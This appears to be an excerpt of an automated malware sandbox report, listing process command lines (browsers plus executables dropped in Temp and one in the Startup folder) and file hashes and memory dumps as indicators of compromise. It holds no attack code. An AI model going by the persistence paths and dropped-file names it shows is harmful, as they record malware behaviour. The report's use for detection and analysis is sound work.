C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5416 -childID 4 -isForBrowser -prefsHandle 5492 -prefMapHandle 5488 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 1108 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f3937819-f7b2-46f7-9f51-ae8e9d2418ab} 2880 "\\.\pipe\gecko-crash-server-pipe.2880" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5596 -childID 5 -isForBrowser -prefsHandle 5676 -prefMapHandle 5672 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 1108 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ca4c65d0-a348-498a-8838-8911e4f0343b} 2880 "\\.\pipe\gecko-crash-server-pipe.2880" tab
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exe"
C:\Users\Admin\AppData\Local\Temp\1006068001\lum250.exe
"C:\Users\Admin\AppData\Local\Temp\1006068001\lum250.exe"
C:\Users\Admin\AppData\Local\Temp\1006149001\6d59325afb.exe
"C:\Users\Admin\AppData\Local\Temp\1006149001\6d59325afb.exe"
C:\Users\Admin\AppData\Local\Temp\1006150001\03f4141975.exe
"C:\Users\Admin\AppData\Local\Temp\1006150001\03f4141975.exe"
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=6d59325afb.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7fff485d46f8,0x7fff485d4708,0x7fff485d4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,2709375927139857413,5082292317771077548,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2212 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,2709375927139857413,5082292317771077548,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2168,2709375927139857413,5082292317771077548,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3040 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2709375927139857413,5082292317771077548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3460 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2709375927139857413,5082292317771077548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3472 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2709375927139857413,5082292317771077548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5044 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\1006152001\d6eb7e4fd8.exe
"C:\Users\Admin\AppData\Local\Temp\1006152001\d6eb7e4fd8.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,2709375927139857413,5082292317771077548,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5360 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,2709375927139857413,5082292317771077548,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5360 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2709375927139857413,5082292317771077548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5356 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2709375927139857413,5082292317771077548,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5448 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2709375927139857413,5082292317771077548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5648 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2709375927139857413,5082292317771077548,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5136 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=6d59325afb.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x16c,0x170,0x174,0x148,0x178,0x7fff485d46f8,0x7fff485d4708,0x7fff485d4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2709375927139857413,5082292317771077548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2709375927139857413,5082292317771077548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5804 /prefetch:1
Network
Files
| SHA256 | 7cb2c50303d1e99512901f58ff979d80f44bb07a69b70ffa91b0ac66bc3e41c4 |
| SHA512 | 38feadf0fec03a36fa456a74aaae4133217382976546ca9bbaa86a0bf6d7c7ace329540eb47d84a653e28a5c3db33b03d8a09b348008c6ebc0e5c0ddeac75246 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n4zftpal.default-release\prefs-1.js
| MD5 | 454df4c82c8b07f1d3d24362264397fc |
| SHA1 | 8eb105bd95f7198a1c9c634c3002110444f89f08 |
| SHA256 | 58905ed8dabb979324b2d7b7639b147dd2cef9b1f51ad7b4b537ec1d22d00596 |
| SHA512 | 32344dc4cfada535323fcaf7ae6c900870b08780098e44e43f665cf13b42780c428a458b6afe542ac1f153422318caaf8cd43aac8d116c6d54f30ddf1d960da1 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n4zftpal.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | f586df8fed8dfc2ab96435e69e612af8 |
| SHA1 | dc662b4c126824997efc4d41693b62d1fde9b81d |
| SHA256 | 64f62ce57a9ac0873b97e3d32c63f4fdb78ec235468b61dbb1e73272dafb0c54 |
| SHA512 | 7488897f752ae3acf49579b3da3e1fcca5265cf217d95b505eeb38679d1fcaa72c02a84789f1c7edbe17492606dcd8ef94e6332cfbde5e795f10b91ecfbd5b78 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n4zftpal.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | 5ddce8d840b256966f73f832193b4882 |
| SHA1 | 74bc89b548c9a210ce2a90944d3942690ca91fe3 |
| SHA256 | 5a840408a4d04a4d7c0f807d445c164b307220b0a8cb7121d535a59768d85dbe |
| SHA512 | 4599ed82b32832cc220f9a3a50614697b668d395680596539fa5040de22c90a7e2224b08750be862a0f49ef2466f3f031e00f1db3b8030713014aa6371edf7e3 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n4zftpal.default-release\datareporting\glean\pending_pings\8e125b94-84f0-4fa2-981e-92c93de9eaf4
| MD5 | 8982fe2f9ddc560796bcad83f7617de4 |
| SHA1 | 10aded9aa34757a35dbd28019dcf5e7a6af9a4d9 |
| SHA256 | 4219f478e89b11bb944541f5986f4a87a3020660a2bf8de0341cb58e08076ff8 |
| SHA512 | 84fc9b991d0e6c715206d77d52e04d91e52c6ca27f61f587359e51b36dc63b628d80a9d6e4c7557eeb9731cc62596ce8a8b548962902476b38cb91473693f204 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n4zftpal.default-release\datareporting\glean\pending_pings\b24637d8-6ffe-44b5-9cab-0ecc0d28d432
| MD5 | 43116ca5c9a44a20bb40594688ae8999 |
| SHA1 | b2ae0dc0c95aab211ab1dd81b7ef02bd282e7077 |
| SHA256 | 6164884d891e28f0c814bc6eb42546f6beb9637243120008cb0b9435e9efba81 |
| SHA512 | 1984232390b8e246bfc399b75cd4e3b1b71af82e1742ee3446c18f1857716cc1100c1e650e7ee200f0b225eed534b2151188525a4395121e04fd00b28a9e429b |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n4zftpal.default-release\datareporting\glean\db\data.safe.bin
| MD5 | f2b8fa344e278dd9ef239ce79a329ab6 |
| SHA1 | 8c201396dc2d24e49932b2ad4bab6b96d9776a42 |
| SHA256 | 3097687e343248edabe2473c49dcbccb1466ebf000baddb429770936890fd00c |
| SHA512 | 3e8c546fe59e16ed633c063e1466f64761ec9f93e272454e37d2db8eb5296f4b264f9b1b15fdbc688d98ac7e2fc2cbe2fef25b07537fa0219c3eb5cfa4e24902 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n4zftpal.default-release\AlternateServices.bin
| MD5 | 287e7ceb62ab2414eaa7257bd820d312 |
| SHA1 | 18fddbd27aa59a6dc1240b189729c41933bdd3c9 |
| SHA256 | f803c975114d9c2ec5d4b8f641c7f47630982a36fabcfc56a251d7f39997c292 |
| SHA512 | 8759ffba4bf57583dd8d6174d7ba5edc17540f788365b04110ac2fba1cb1404a7eb397874e919eaeebecaeb9958d3e5bb984d26d6f892f98e0ed2a18dc8060a2 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n4zftpal.default-release\AlternateServices.bin
| MD5 | a4742a9520c790b44c9e2e6a29a8e27e |
| SHA1 | 91e33cecda6f0dbcbc8af1bc53093a1492618e7a |
| SHA256 | 79c983af4bfdcc27b26ced9a6eade9d4a54041a9412b8ca9d5c4260517e63ba1 |
| SHA512 | c2fd33b0e6b27c5aba0457fff4fb974085052baa7c0d81f18a6adfeea428a2e3d107f076a1da342c628ea1a7a19a246d5c42576c93adca46a8e71db6c2151ceb |
memory/448-1635-0x0000000140000000-0x0000000140026000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n4zftpal.default-release\prefs-1.js
| MD5 | be681c1ec4616b25c1a52abc66c0bb05 |
| SHA1 | 9f1dd845fc8a1bf132c78e331b83d0535f03e01e |
| SHA256 | b44447ac87d9ab03663fd1f3fdc966ccf55a00e64fbddaa75a6784683683fbd8 |
| SHA512 | 678df0cac274429d50f0c770f4907dddb8e8ccd823072ad3cb3a0a52d1df7501a5c7e404ae6cc3b74e2ecc4763527dfb6e65fb658242fe0a5f9102b0e9286093 |
C:\Users\Admin\AppData\Local\Temp\1006068001\lum250.exe
| MD5 | 5b015748645c5df44a771f9fc6e136c3 |
| SHA1 | bf34d4e66f4210904be094e256bd42af8cb69a13 |
| SHA256 | 622c5cb9a11085da8240c94262f596b687b3ecc2bc805b7f5a01cc335f7df909 |
| SHA512 | 026a32a969f973f91f6e848ce3509546ef70bddfdb39ed08c177c2cd1eddeb1297a2d722fa8542a9a09a3d0b9d4c8df0d35139b1c7ae0beba1b964a6b8003302 |
memory/6148-1654-0x0000000000660000-0x0000000000B07000-memory.dmp
memory/6148-1682-0x0000000000660000-0x0000000000B07000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1006149001\6d59325afb.exe
| MD5 | 339c52d2c7eec1633781ec61ccc7514e |
| SHA1 | 6b09c06d7a22426b2328bffc613048f10ac4e8ab |
| SHA256 | 2b85e0eea5090d9465aada5fc32e429809d84501beac1b4d006ac172dfd46a33 |
| SHA512 | 67006226777747bbd7fd7d6849a53464f55c37f19944b9afdd67971b8f061a56744eb1a3fe2884e866b0ba081fcae61c81b872265c2cccd6889bb19c1174fc02 |
memory/6612-1697-0x00000000001D0000-0x00000000004D3000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1006150001\03f4141975.exe
| MD5 | e3fb8d95bf3280bcaec77ae6d1b6f357 |
| SHA1 | d8cb310e8bf2d8af8b3265d4f17b6163617f389a |
| SHA256 | 8913aa554d50871ce1c5086aec81ad11cc16f90a815b3151b2234782d8c5a63e |
| SHA512 | 82b7f2bcfdb064096d0cf0b8a7a798c3ae89a4558afa8caaafe0d95f80390bc097d97455a53a9be3cae28385a42beb85e79e020d13f85a54b33fe25a3bc2e49d |
memory/6944-1717-0x0000000000540000-0x0000000000BE4000-memory.dmp
memory/6944-1719-0x0000000000540000-0x0000000000BE4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 743c94288160844d1ae13069f1a825c5 |
| SHA1 | ec77f93a050137e2e5f513cbe400017b4f9e357a |
| SHA256 | f7b331cc4fe583017fb912678dfd097f60bbfca698135f98e884462c661b044f |
| SHA512 | 8552770e88e4a927f33378a1f7ffba1d3ece31e3f899b852ee5e854925535953caf7ad3e5ca3081ddd17cb0d5a200c6c1d180af9180a9e62fb8513ca23ab408e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | a1989ba41c4c8e298a0ccbd332e9d484 |
| SHA1 | ca89bb312fd95d9149cd98c30a32f2451063a810 |
| SHA256 | 9f4a3d70e4036141d6066dc463a2811805501e8e5a73fd3c21575405d3ad28ba |
| SHA512 | c1254a69dfb95cdef0a08c2bd1c711d92e77ce177f6162f5abf55e39e620adf7d60509a004ebf5cda1f86afbea9dc30404eb0263118c921e2920249fdda0cc23 |
memory/6612-1784-0x00000000001D0000-0x00000000004D3000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1006152001\d6eb7e4fd8.exe
| MD5 | 16f564fb9d0469e8d627302877e5c1f9 |
| SHA1 | 71d7413eba455f93508c40d2cdd3bd35f842a37f |
| SHA256 | d8cd4c3d9360be697992d674413f2d6972771d1afedc6bb59123ddda1810a346 |
| SHA512 | 25f5614567173da473b38f0d869d461b0dc625f7a58c44495c23b6cea676ab0818032b9101310ed8a7aa8091d7a515ea27402683c2532fb8ccff13df9892c2c2 |
memory/1100-1802-0x0000000000530000-0x00000000007F4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | aefd77f47fb84fae5ea194496b44c67a |
| SHA1 | dcfbb6a5b8d05662c4858664f81693bb7f803b82 |
| SHA256 | 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611 |
| SHA512 | b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3 |
memory/1100-1809-0x0000000000530000-0x00000000007F4000-memory.dmp
memory/1100-1810-0x0000000000530000-0x00000000007F4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | cb880ac7fd445e9dcf2e360b9319c393 |
| SHA1 | 67d9c6a817207719abb5bfa2dcb9c386c9774432 |
| SHA256 | 33af3da9458e9342e9d3aad6f2680e60ec7568027dbde25a0dc031c9115afb9e |
| SHA512 | 89b1851e65e5c5669c82a3adc9bb33cef49403ddd614a2b5686df41b54c462ddd107240e247870d23fa48e68faf88ed21a97c04966bccf78440d7836e1a41853 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 50f82707bc17eb95b753ce92726965ce |
| SHA1 | a1af727ca71028720d8d945e1b76fb2d43eacba9 |
| SHA256 | ae907aa570723ae44b40513a1cb13f7be2b36b4dd8f42b4a73a294446c92286d |
| SHA512 | 1f1a7244292b5d872612ce43dedfb291316cde224fed5ef05d92a02914e73bac2596db9cf277da3593b6b08044c2736f3a22a2ac4bc70c99f8928f21cf664a19 |
memory/6612-1871-0x00000000001D0000-0x00000000004D3000-memory.dmp
memory/1100-1878-0x0000000000530000-0x00000000007F4000-memory.dmp
memory/1100-1881-0x0000000000530000-0x00000000007F4000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n4zftpal.default-release\datareporting\glean\db\data.safe.bin
| MD5 | 39ae0943b7e51985b6c0e03f557e7466 |
| SHA1 | 5efeadd947f1afdf82ad5a6ce59f738f4f8b8ff8 |
| SHA256 | 03460b0a033210ef8935a4c6fd2eaedf4cb64cbf954b250233814bb5c500a23a |
| SHA512 | d976795dada8f6d4bad8a520b9f40069a612271c74cc7b1d3260e3de1a95b440ae16dfa0f5a21d363408e0cea4132017a665629f087595fdb6ad989213a6dcc2 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n4zftpal.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | 2f7b49bb3f062074de47aec2e02fb2d2 |
| SHA1 | 9463cd61f4650f6c4742ed935a1aa796073bffda |
| SHA256 | 9d8818e11815753fa42e65d2e0ff69441da71a5166cf9fe7def7276caf842d37 |
| SHA512 | 7d96c7cdd684617cddcfbafedac1c4294218b148c288b36bdcee64e14a4add799f6b44ca82260181cfed8ac9221d6ee1274e51d385d097fe305b475c2e8e6c26 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n4zftpal.default-release\prefs-1.js
| MD5 | 958f8680904cacd658f8618de14f857e |
| SHA1 | a3a422e9d780e657145fce42ebc516048b96a260 |
| SHA256 | 587c383f4e595eb8bdf699cf1058ff2b14a2f8008c8fc8a3bfacdd7fe29b9c8c |
| SHA512 | caf967a086e43ff8b39906ccb4524377a14ecb1c0b90fe3d346457d48af07b6c22e90f467d502f87bd83ef66f7554ff3327e365a2b258ab44a0b91f48d83cd60 |
C:\Users\Admin\AppData\Local\Temp\tmpaddon
| MD5 | 09372174e83dbbf696ee732fd2e875bb |
| SHA1 | ba360186ba650a769f9303f48b7200fb5eaccee1 |
| SHA256 | c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f |
| SHA512 | b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n4zftpal.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
| MD5 | 2a461e9eb87fd1955cea740a3444ee7a |
| SHA1 | b10755914c713f5a4677494dbe8a686ed458c3c5 |
| SHA256 | 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc |
| SHA512 | 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n4zftpal.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
| MD5 | 842039753bf41fa5e11b3a1383061a87 |
| SHA1 | 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153 |
| SHA256 | d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c |
| SHA512 | d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n4zftpal.default-release\AlternateServices.bin
| MD5 | e3b8bd9e1c019db405571352ed7ce1e7 |
| SHA1 | f36e2e2476f55b22fde22d0ca5c46a940ff5d3d9 |
| SHA256 | 8005f886fbdcbb161d334fe694834d7c9bb15969c2d79a62c05e4e5ed8ade2d3 |
| SHA512 | b4e42f829be6ab6fd67b876a1428a7ea4407cad4626bb8ac22bfce57b791c6754f06fd43a9386dc1309f9f603832269a435b1e60f288d991d6eda29543555ce1 |
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1
| MD5 | 0a8747a2ac9ac08ae9508f36c6d75692 |
| SHA1 | b287a96fd6cc12433adb42193dfe06111c38eaf0 |
| SHA256 | 32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03 |
| SHA512 | 59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n4zftpal.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
| MD5 | bf957ad58b55f64219ab3f793e374316 |
| SHA1 | a11adc9d7f2c28e04d9b35e23b7616d0527118a1 |
| SHA256 | bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda |
| SHA512 | 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n4zftpal.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
| MD5 | daf7ef3acccab478aaa7d6dc1c60f865 |
| SHA1 | f8246162b97ce4a945feced27b6ea114366ff2ad |
| SHA256 | bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e |
| SHA512 | 5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | b0ead4581f5a4182edee3e648cbae3f3 |
| SHA1 | 8814c7f08fb801519fe67d2d6f0176046eba76e6 |
| SHA256 | 6f009f602eb1a9dbccb1daf7fa570d55c995f113307fd973fa0267904900fbae |
| SHA512 | 9da2ea3e1c7cbbcb122c704014808c9524c42821f51750e0b242acf68ef09d8382f11b8c4285e6c74674a90d728579d61274cda1b3ececefcf29b98a1a76c1bb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 807419ca9a4734feaf8d8563a003b048 |
| SHA1 | a723c7d60a65886ffa068711f1e900ccc85922a6 |
| SHA256 | aa10bf07b0d265bed28f2a475f3564d8ddb5e4d4ffee0ab6f3a0cc564907b631 |
| SHA512 | f10d496ae75db5ba412bd9f17bf0c7da7632db92a3fabf7f24071e40f5759c6a875ad8f3a72bad149da58b3da3b816077df125d0d9f3544adba68c66353d206c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | ee2fa3397ff7d07094f8d63dc9db0f61 |
| SHA1 | 9f4c071ecdb57565ab635e6f376d2df66d452f53 |
| SHA256 | cb134604fbcf9f94943f2ff4cec05219586bc040fc909f2bc797340699c02523 |
| SHA512 | dafc5324cd26ecccdb3459f2942bd1e53bacd1937801db2b938ad35b50ab0cdea05d5a2d1285269ac4b996f97414a2d3550f746affe03ad06abca5e28ad90cd6 |